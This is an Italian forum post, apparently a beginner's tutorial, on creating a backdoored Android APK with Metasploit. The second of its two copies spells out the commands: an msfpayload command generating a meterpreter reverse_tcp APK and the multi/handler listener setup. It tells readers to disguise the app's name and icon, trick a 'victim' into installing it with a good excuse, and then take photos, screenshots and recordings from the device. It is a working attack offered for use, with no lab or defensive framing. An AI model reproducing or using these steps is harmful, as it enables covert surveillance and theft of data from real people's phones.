ciaooo a tutti ragazzi ! sono nuovo nel forum ! :spam: questa è la mia prima guidaaaa
come da titolo ecco come creare una backdoor tramite un'apk creata tramite payload con kali linux =)
PREMESSA:
la guida originale in inglese la trovate qui --> Hacking Android Smartphone using Metasploit in Kali Linux « Hacking With Kali Linux
ed il video tutorial qui --> https://www.youtube.com/watch?v=ajBIrmnLTfA#t=267
io ho solo voluto testare la guida e riproporla in italiano passo passo per dare una mano a tutti
allora iniziamooo
passo 1 :
iniziamo con il digitare nel terminale il payload da utilizzare con relativo nostro indirizzo ip ( reperibile tramite il comando "ifconfig" e poi sulla voce " inet addr= ... " ) e la porta da utilizzare.
ps. consiglio la porta "443" e di personalizzare il nome dell'apk.
passo 2 :
apriamo msfconsole da terminale !
passo 3 :
selezioniamo l'exploit
selezioniamo il payload
settiamo l'indirizzo ip preimpostato
settiamo la porta preimpostata
ora digitiamo exploit e mettiamoci finalmente in ascolto !! =) installate l' apk sul device della vittima ( cambiando immagina nome e con una bella scusa ) potremo con i vari comandi ( webcam_list, sysinfo, webcam_sanp ecc.. ) fare foto, screen, registrare messaggi ecc. come una backdoor per pc!
grazie a tutti e buon divertimento !!
come da titolo ecco come creare una backdoor tramite un'apk creata tramite payload con kali linux =)
PREMESSA:
la guida originale in inglese la trovate qui --> Hacking Android Smartphone using Metasploit in Kali Linux « Hacking With Kali Linux
ed il video tutorial qui --> https://www.youtube.com/watch?v=ajBIrmnLTfA#t=267
io ho solo voluto testare la guida e riproporla in italiano passo passo per dare una mano a tutti
allora iniziamooo
passo 1 :
iniziamo con il digitare nel terminale il payload da utilizzare con relativo nostro indirizzo ip ( reperibile tramite il comando "ifconfig" e poi sulla voce " inet addr= ... " ) e la porta da utilizzare.
HTML:
msfpayload android/meterpreter/reverse_tcp LHOST=<nostro ip> LPORT=<nostra porta> R > hack.apk
ps. consiglio la porta "443" e di personalizzare il nome dell'apk.
passo 2 :
apriamo msfconsole da terminale !
passo 3 :
selezioniamo l'exploit
HTML:
use exploit/multi/handler
selezioniamo il payload
HTML:
set payload android/meterpreter/reverse_tcp
settiamo l'indirizzo ip preimpostato
HTML:
set lhost <ip>
settiamo la porta preimpostata
HTML:
set lport 443
ora digitiamo exploit e mettiamoci finalmente in ascolto !! =) installate l' apk sul device della vittima ( cambiando immagina nome e con una bella scusa ) potremo con i vari comandi ( webcam_list, sysinfo, webcam_sanp ecc.. ) fare foto, screen, registrare messaggi ecc. come una backdoor per pc!
grazie a tutti e buon divertimento !!